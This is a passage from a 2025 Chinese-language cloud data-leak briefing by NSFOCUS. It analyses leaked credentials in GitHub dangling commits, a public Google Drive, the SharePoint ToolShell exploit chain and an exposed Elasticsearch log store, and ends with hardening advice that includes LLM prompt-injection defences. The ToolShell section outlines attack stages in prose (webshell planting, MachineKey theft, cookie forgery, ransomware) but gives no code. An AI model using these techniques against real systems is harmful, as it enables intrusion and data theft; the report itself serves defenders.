ā)中意外提交了憑證,后續(xù)雖然嘗試移除,但由于Git的歷史不可變性、憑證輪換不及時,以及安全檢測范圍有限,導致這些敏感信息仍可在倉庫的隱蔽歷史(danglingcommits)中被掃描并利用,具體如下所示:1.對Git的刪除機制不熟悉開發(fā)者誤提交憑證后,通過強制更改當前提交的HEAD引用并使用gitpush--force來覆蓋提交以“刪除”泄露內容。但Git仍然保存了DanglingCommits,其中的數(shù)據(jù)并不會被真正刪除。這些隱蔽的歷史提交成為攻擊者掃描的重點,從而暴露敏感信息。2.憑證輪換不足大量泄露憑證雖然已不再出現(xiàn)在最新代碼中,但依然處于可用狀態(tài)。缺乏及時的注銷和替換機制,使得攻擊者能夠直接利用歷史泄露的信息,造成實際的安全威脅。3.SecretScanning范圍不完善全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技現(xiàn)有檢測工具多聚焦于活躍分支和新增提交,而對歷史提交、被覆蓋的分支或danglingcommits缺乏覆蓋。這導致組織往往誤以為已完成清理,實際卻仍留有大量未被發(fā)現(xiàn)的敏感信息。VERIZON事件分類:LostandStolenAssets(丟失和被竊取的憑證)所用MITREATT&CK技術:技術子技術利用方式T1593搜索開放網(wǎng)站/域.003公開代碼倉庫攻擊者利用GitHub的公開倉庫搜索功能,定位danglingcommits中可能包含敏感信息的提交。T1213從信息庫中收集數(shù)據(jù).003代碼倉庫攻擊者從GitHub歷史提交(包括已被force-push覆蓋的提交對象)中提取憑證、密鑰等敏感數(shù)據(jù)。T1530從云存儲中收集數(shù)據(jù)N/AGitHub作為云端代碼存儲平臺,攻擊者直接從其底層對象存儲(blob數(shù)據(jù))中收集敏感信息。T1587開發(fā)功能.004工具攻擊者或研究人員利用AI驅動或自動化掃描工具批量搜索GitHub歷史提交,提高敏感信息的發(fā)現(xiàn)效率。T1593搜索開放網(wǎng)站/域.003公開代碼倉庫攻擊者利用GitHub的公開倉庫搜索功能,定位danglingcommits中可能包含敏感信息的提交。參考鏈接:/security/hacker-scans-github-uncovers-sensitive-secrets//blog/guest-post-how-i-scanned-all-of-github-s-oops-commits-for-leaked-secrets/@sharon.brizinov/how-i-made-64k-from-deleted-files-a-bug-bounty-story-c5bd3a6f5f9b全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技事件八:國外某高校使用的谷歌云盤因開啟文件公開訪問權限導致大規(guī)模學生個人信息事件時間:2025年7月泄露規(guī)模:數(shù)千名學生證遭至泄露,包括個人姓名、學號、照片事件回顧:2025年7月,綠盟科技創(chuàng)新研究院發(fā)現(xiàn)互聯(lián)網(wǎng)中有一公開暴露的谷歌云盤,因未進行任何有效訪問控制和認證機制,導致可被任意互聯(lián)網(wǎng)用戶,包含惡意攻擊者進行訪問,暴露的谷歌云盤中泄露了國外某高校數(shù)千名學生個人隱私信息等內容。事件分析:谷歌云盤是谷歌提供的一項云存儲服務,允許用戶存儲、同步和共享文件。用戶可以通過任何設備訪問文件,并支持多人協(xié)作編輯文檔、表格和幻燈片等。谷歌云盤與GoogleDocs、Sheets和Slides等工具深度集成,提供15GB的免費存儲空間(與Gmail、GooglePhotos共享),導致此次事件的根因是用戶將谷歌云盤中的文件或文件夾設置為“公開”(即任何人可訪問),并可能會帶來以下安全風險:(1)敏感信息暴露:如果誤將包含個人隱私、公司機密、財務數(shù)據(jù)或密碼的文件公開,可能導致信息被惡意利用。(2)合規(guī)風險:涉及法律或行業(yè)監(jiān)管的數(shù)據(jù)泄露可能導致罰款或法律訴訟。2.未經(jīng)授權的訪問與濫用(1)文件被篡改或刪除:公開鏈接可能被惡意用戶利用,修改或刪除重要文件。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技(2)惡意軟件傳播:攻擊者可上傳惡意文件并通過公開鏈接傳播病毒、勒索軟件等。3.賬戶安全風險(1)社工攻擊:公開的文件可能暴露賬戶信息,增加釣魚攻擊風險。(2)暴力破解:如果文件名或內容包含賬戶線索,可能被用于針對性攻擊。4.資源濫用(1)帶寬耗盡:公開的大文件(如視頻、軟件)可能被大量下載,導致谷歌賬戶的帶寬(2)存儲占用:若共享權限設置不當,他人可能上傳垃圾文件到你的云盤。VERIZON事件分類:MiscellaneousErrors(雜項類錯誤)所用MITREATT&CK技術:技術子技術利用方式T1593搜索開放網(wǎng)站N/A攻擊者主動搜索可公開訪問的GoogleDrive鏈接,作為攻擊的起點。T1530云存儲中獲取數(shù)據(jù)N/A攻擊者直接從配置不當?shù)腉oogleDrive下載文件T1567通過Web服務滲出.002攻擊者將竊取的數(shù)據(jù)傳輸?shù)剿麄兛刂葡碌牧硪粋€云存儲服務中。攻擊者利用GoogleDrive等服務的合法流量作掩護,將數(shù)據(jù)轉移出去,使其難以被發(fā)現(xiàn)。T1657財務盜竊N/A泄露的數(shù)據(jù)被用于金融欺詐或導致公司被監(jiān)管罰款全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技家政府機構和私營公司事件時間:2025年7月泄露規(guī)模:數(shù)十臺微軟SharePoint服務器被成功入侵,近10000臺服務器受到嚴重威脅,漏洞利用可導致遠程代碼執(zhí)行和持久化訪問,攻擊者能夠在受害系統(tǒng)中竊取敏感文件、內部通信及憑證數(shù)據(jù)。事件回顧:2025年5月在Pwn2OwnBerlin大會中,SharePoint平臺漏洞CVE-2025-49706(身份繞過)與CVE-2025-49704(反序列化RCE)被首次展示并組合為名為“ToolShell”的攻擊鏈。2025年7月8日微軟在當月的PatchTuesday中發(fā)布安全更新,修復了CVE-2025-49704及CVE-2025-49706。但安全研究人員發(fā)現(xiàn),補丁并不完全,部分變種仍可繞過。2025年7月17-19日,EyeSecurity發(fā)現(xiàn)實質攻擊正在進行,后續(xù)(7月29日)進行澄清與更正,指出此次利用的是原始ToolShell漏洞(CVE-2025-49706+CVE-2025-49704并非后來編號的0day變體。同一時期,Cybernews等平臺報告稱存在大規(guī)模SharePoint零日漏洞(CVE-2025-53770/53771)被攻擊,但部分攻擊仍源自上述原始漏洞鏈。2025年7月19-20日微軟緊急發(fā)布補丁,覆蓋新版漏洞CVE-2025-53770(RCE)和CVE-2025-53771(身份繞過)。美國網(wǎng)絡安全和基礎設施安全局將CVE-2025-53770納入已知被利用的漏洞(KEV)列表(7月20日),隨后于7月22日也將CVE-2025-49704與CVE-2025-49706納入KEV,全力響應。2025年7月下旬微軟與CISA警告多個國家級組織和企業(yè),強烈建議隔離系統(tǒng)、啟用AMSI、防火墻規(guī)則,并進行資產(chǎn)調查。多條攻擊鏈信息披露,攻擊者已植入WebShell、提取MachineKey,部署勒索軟件Warlock/Lockbit,造成持久后門控制與潛在破壞。漏洞影響范圍:ToolShell漏洞鏈(CVE-2025-49706與CVE-2025-49704)最初通過身份繞過與反序列化遠程代碼執(zhí)行的組合,使攻擊者能夠在無需合法憑證的情況下獲取SharePoint系統(tǒng)的高權限訪問,并進一步投遞WebShell、竊取MachineKey,從而建立持久控制并為后續(xù)橫向移動、全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技數(shù)據(jù)竊取和勒索軟件植入創(chuàng)造條件。盡管微軟在補丁中修復了相關問題,但后續(xù)出現(xiàn)的變體(CVE-2025-53770與CVE-2025-53771)繼續(xù)延續(xù)遠程代碼執(zhí)行與身份繞過的攻擊思路,并被證實已在野利用。根據(jù)ShadowServerFoundation的檢測,全球約9300個SharePoint服務器IP暴露在互聯(lián)網(wǎng)上,其中美國占3043個,其余分布位于荷蘭、愛爾蘭、英國、加拿大和德國等國家。根據(jù)CheckPointResearch的數(shù)據(jù),政府組織是最大的目標,49%的受害者屬于該行業(yè)。軟件和電信行業(yè)分別吸收了24%和9%的攻擊。事件分析:ToolShell漏洞鏈工作原理:ToolShell漏洞鏈由CVE-2025-49706(身份繞過)和CVE-2025-49704(反序列化遠程代碼執(zhí)行)組成。攻擊者首先借助身份繞過漏洞繞過SharePoint的認證邏輯,在無需合法憑證的情況下偽裝成合法用戶進入系統(tǒng)。接著,攻擊者利用反序列化漏洞觸發(fā)對象處理過程中的安全缺陷,將特制的惡意載荷注入到反序列化流程,從而在目標SharePoint服務器上執(zhí)行全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技任意代碼。其后續(xù)變體(如CVE-2025-53770/53771)繼承了相同的利用思路,但通過改進攻擊手法和繞過補丁機制,使得微軟在7月補丁后仍存在攻擊面。1.入口階段:攻擊者通過CVE-2025-49706或后續(xù)的身份繞過變體(CVE-2025-53771直接繞過身份驗證獲取SharePoint入口訪問權限。2.代碼執(zhí)行階段:利用CVE-2025-49704或CVE-2025-53770,在目標系統(tǒng)中觸發(fā)反序列化漏洞或遠程代碼執(zhí)行漏洞,執(zhí)行惡意指令。3.持久化階段:攻擊者植入WebShell(通常為ASPX確保能夠在系統(tǒng)重啟或補丁應用后仍保持訪問。4.橫向滲透階段:通過竊取MachineKey等關鍵配置文件,攻擊者能夠偽造認證Cookie,橫向擴展控制更多服務或用戶會話。5.破壞與獲利階段:攻擊者可能進一步投遞勒索軟件,加密關鍵數(shù)據(jù)或中斷服務,借此勒索企業(yè)贖金;部分情況下也會竊取敏感信息或長期維持后門控制。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技技術子技術利用方式T1190利用面向公網(wǎng)的應用程序漏洞N/A攻擊者利用SharePoint0day漏洞(CVE-2025-53770/53771,ToolShell鏈變體)在未授權情況下執(zhí)行遠程代碼。T1059命令和腳本解釋器.001PowerShell攻擊者通過漏洞在SharePoint服務器上執(zhí)行遠程代碼,運行PowerShell腳本實現(xiàn)控制。T1078有效賬戶.001本地賬戶攻擊者利用漏洞繞過身份驗證,使用獲取的本地或服務賬戶保持訪問權T1547啟動或登錄自動執(zhí)行.001注冊表運行鍵/啟動文件夾攻擊者在服務器上植入后門,確保系統(tǒng)重啟后仍能繼續(xù)訪問。T1210利用遠程服務N/A攻擊者利用SharePoint服務漏洞提升訪問權限,實現(xiàn)遠程控制。T1486數(shù)據(jù)加密以造成影響N/A攻擊者可能加密或破壞SharePoint數(shù)據(jù),造成業(yè)務中斷或信息泄露。參考鏈接:/security/sharepoint-zero-day-exploitation-threatens-thousands/全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技事件十:配置不當?shù)腅lasticsearch實例導致MagentaTV泄露超過3.24事件時間:2025年6月泄露規(guī)模:超過3.24億個日志條目,其中包括用戶的IP地址、MAC地址、會話ID、客事件回顧:2025年6月,Cybernews研究團隊發(fā)現(xiàn)一個沒有采取訪問控制的Elasticsearch實例,該實例屬于MagentaTV使用的SSAI(服務器端廣告插入)平臺Serverside.ai(隸屬于法國廣告科技公司Equativ)。該實例持續(xù)接收MagentaTV平臺每日400萬至1800萬條新日志,累積泄露數(shù)據(jù)超過3.24億條。研究團隊表示,雖然大多數(shù)泄露數(shù)據(jù)并不敏感,但仍存在一些用戶的IP地址、MAC地址、會話ID、客戶ID、用戶代理等信息。攻擊者仍能利用這些泄露數(shù)據(jù)跟蹤、識別用戶位置并進行針對性的攻擊。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技Cybernews研究團隊在2025年6月18日首次披露該漏洞并通知相關方,隨后在7月2事件分析:此次事件的根本問題在于廣告日志系統(tǒng)缺乏必要的安全管控,導致敏感數(shù)據(jù)直接暴露在公網(wǎng),任何人都能在未授權的情況下訪問。其風險主要體現(xiàn)在以下幾個方面:1.未采取有效訪問控制的Elasticsearch實例:暴露的ES實例未啟用身份認證或網(wǎng)絡訪問限制,攻擊者可直接通過RESTAPI查詢或批量導出日志數(shù)據(jù)。由于ES支持批量操作和全文檢索,攻擊者可以快速索引和篩選敏感信息,造成大規(guī)模泄露風險。同時,部分版本ES允許數(shù)據(jù)寫入或刪除,攻擊者可進行日志篡改、數(shù)據(jù)投毒或擦除痕跡,從而影響取證和業(yè)務安全,進一步放大危害。2.敏感日志暴露:雖然日志數(shù)據(jù)并非直接包含用戶密碼等隱私,但包含IP、MAC、會話標識等敏感字段,這些信息可被攻擊者用于構建用戶畫像、進行跨平臺追蹤,或結合其他泄露數(shù)據(jù)開展精準釣魚和社會工程攻擊,間接導致用戶隱私和業(yè)務安全受損。3.供應鏈安全薄弱環(huán)節(jié):MagentaTV客戶端設備由第三方OEM制造,并在德國運營,這些設備若存在漏洞,泄露的網(wǎng)絡與設備標識將進一步加劇風險。VERIZON事件分類:MiscellaneousErrors(雜項類錯誤)所用MITREATT&CK技術:全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技技術子技術利用方式T1526-數(shù)據(jù)存儲未加防護N/A某第三方廣告服務商服務器上的Elasticsearch實例未啟用訪問控制,攻擊者能夠未經(jīng)授權訪問存儲日志端點。T1530-從云存儲收集數(shù)據(jù)N/A攻擊者可直接利用Elasticsearch接口下載整個日志庫,包括3.24億條日志條目(729GB)。T1593-搜索開放網(wǎng)站/域N/A暴露的Elasticsearch實例可能通過Shodan等網(wǎng)絡空間搜索引擎被發(fā)現(xiàn),進而被利用進行數(shù)據(jù)泄露。T1589-電信基礎設施操縱N/A(特定場景)泄露日志中包含會話ID、用戶ID等關鍵字段,可被濫用用于劫持會話、進行用戶行為追蹤,進而操縱用戶設備或訪問。參考鏈接:/security/deutsche-telekom-magentatv-data-leak/全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)安全建議?2025綠盟科技-全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技前文我們全球7-8月云上數(shù)據(jù)泄露典型事件進行了詳細解讀,如下圖所示,從事件分類模式上看,雜項錯誤是導致數(shù)據(jù)泄露的主要原因,占比高達50%。社工類和系統(tǒng)入侵各占比約20%,剩余丟失和被盜竊的憑證占比10%。2.1針對雜項錯誤類的安全建議針對ES存儲泄露風險,建議:1.務必啟用內置的Elasticsearch安全功能或使用如Nginx/HAProxy等反向代理進行基礎認證。2.配置角色和權限,遵循最小權限原則,為不同的用戶或應用程序服務分配精確的角色,只授予其執(zhí)行必要操作的權限。避免使用管理員賬號進行日常操作。或采用基于角色的訪問控制(RBAC):定義清晰的角色(如只讀用戶、特定索引寫入用戶、集群管理員)并為每個角色分配適當?shù)臋嘞蕖?.禁用匿名訪問:確保xpack.security.enabled:true并在elasticsearch.yml中配置用戶和角色。4.網(wǎng)絡訪問限制:只允許來自可信IP地址或網(wǎng)絡范圍的訪問。盡量不要將ES直接暴露在公共互聯(lián)網(wǎng)上。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)?2025綠盟科技針對對象存儲如AzureBlob存儲的公開訪問泄露,建議默認私有化訪問,訪問層級設置為“私有(Private)”:在創(chuàng)建Blob容器時,將其訪問層級設置為“私有”。避免使用SAS(SharedAccessSignature)Token的長時間有效性或過高權限:如果必須使用SASToken,請確保其有效期盡可能短,并且只授予必要的最小權限如,僅讀取。針對GoogleDrive文件或文件夾的公開配置泄露,同樣建議默認私有化訪問,在共享任何文件或文件夾之前,務必仔細檢查共享設置。默認情況下,它們應該是私有的,只有被明確邀請的用戶才能訪問。避免使用“知道鏈接的任何人”權限:這是最危險的共享選項,它會將文件暴露給互聯(lián)網(wǎng)上的任何人。僅在絕對必要且文件不包含敏感信息時才使用,并且要謹慎管理這些鏈接。本篇報告中提及的LaravelAPP_KEY泄露根因是.env文件中的敏感信息被公開訪問,導致應用程序被控制、數(shù)據(jù)被竊取或云資源被濫用。建議進行嚴格的文件訪問控制,例如:1.將.env文件添加到.gitignore2.合理使用服務器文件權限,確保.env文件的文件權限設置為嚴格的只允許應用程序運行用戶讀取。禁止其他用戶讀取該文件。3.不在Web可訪問目錄中存放.env,確保.env文件位于Web服務器的文檔根目錄之外。全球云上數(shù)據(jù)泄露風險分析簡報(第七期)全球云上數(shù)據(jù)泄露風險分析簡報(第七期)2.2針對社工類和系統(tǒng)入侵的安全建議隨著模型與業(yè)務集成的耦合度越發(fā)增高,對于攻擊者而言,利用模型來攻破業(yè)務體系的成本也越來越低,核心原因還是模型自身的安全圍欄易被繞過,且模型與業(yè)務間缺乏嚴謹?shù)恼J證授權機制,導致攻擊者可以利用漏洞進行遠程命令執(zhí)行造成系統(tǒng)入侵后果。因此建議企業(yè)和開發(fā)者:1.模型需進行嚴格的輸入/輸出驗證與過濾對所有用戶輸入進行嚴格的凈化和驗證,過濾掉可能包含指令意圖的特殊字符、代碼片段或模糊的指令性語言,同時也要對模型的輸出進行編碼和過濾,防止生成可執(zhí)行的惡意鏈接或腳本。在系統(tǒng)提示和用戶輸入之間使用清晰的、不容易被用戶仿冒的分隔符,以幫助模型更好地區(qū)分指令和待處理的數(shù)據(jù)。2.建立清晰的信任邊界和權限管理遵循最小權限原則:賦予連接到大型語言模型(LLM)的插件或外部應用(如GoogleDrive連接器)最小化的訪問權限。模型只應訪問其執(zhí)行當前任務所必需的數(shù)據(jù)。用戶手動授權:對于涉及敏感操作或訪問敏感數(shù)據(jù)的請求,應設計明確的用戶授權環(huán)節(jié),而不是讓AI自主決定執(zhí)行。3.構建沙盒環(huán)境:在隔離的沙盒環(huán)境中處理來自不受信任來源的數(shù)據(jù),限制其對系
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 信息產(chǎn)業(yè)規(guī)范發(fā)展承諾書4篇
- 感恩母親媽媽的溫暖故事6篇
- 培訓課程設計與學習資源整合工具
- 2025貴州黔東南州劍河縣農(nóng)村集體經(jīng)濟組織選聘職業(yè)經(jīng)理人(總經(jīng)理)考前自測高頻考點模擬試題完整參考答案詳解
- 企業(yè)管理規(guī)范涉及守秘責任保證承諾書3篇
- 2025廣西壯族自治區(qū)文化和旅游廳幼兒園勤雜工(殘疾人專崗)招聘1人考前自測高頻考點模擬試題及答案詳解(新)
- 婚禮場地預訂服務承諾書3篇
- 2025杭州淳安縣公開招聘中小學教師12人考前自測高頻考點模擬試題及參考答案詳解1套
- 2025-2026學年陜西省榆林市榆陽區(qū)某中學高三上學期開學英語試題(解析版)
- 2025年上半年廣東省清遠市直屬學校赴湖南師范大學設點招聘教師15人考前自測高頻考點模擬試題附答案詳解(完整版)
- 藝人獨家經(jīng)紀合同(標準版)
- 2025年肺功能證考試題及答案
- 2026中國海洋石油集團有限公司秋季校園招聘備考考試題庫附答案解析
- 2025年及未來5年中國羊奶粉行業(yè)市場調研分析及投資戰(zhàn)略咨詢報告
- 學校物業(yè)委托管理服務合同7篇
- 2025-2026學年人教版二年級上冊數(shù)學第三單元測試卷(含答案)(三套)
- 《守望成長法治護航》法制教育主題班會
- 橈骨骨折課件教學
- 2025年特種作業(yè)類冶金煤氣作業(yè)理論知識-理論知識參考題庫含答案解析(5卷)
- 2025-2030中國節(jié)能玻璃材料市場發(fā)展動態(tài)及競爭格局研究報告
- 數(shù)據(jù)標注課件
評論
0/150
提交評論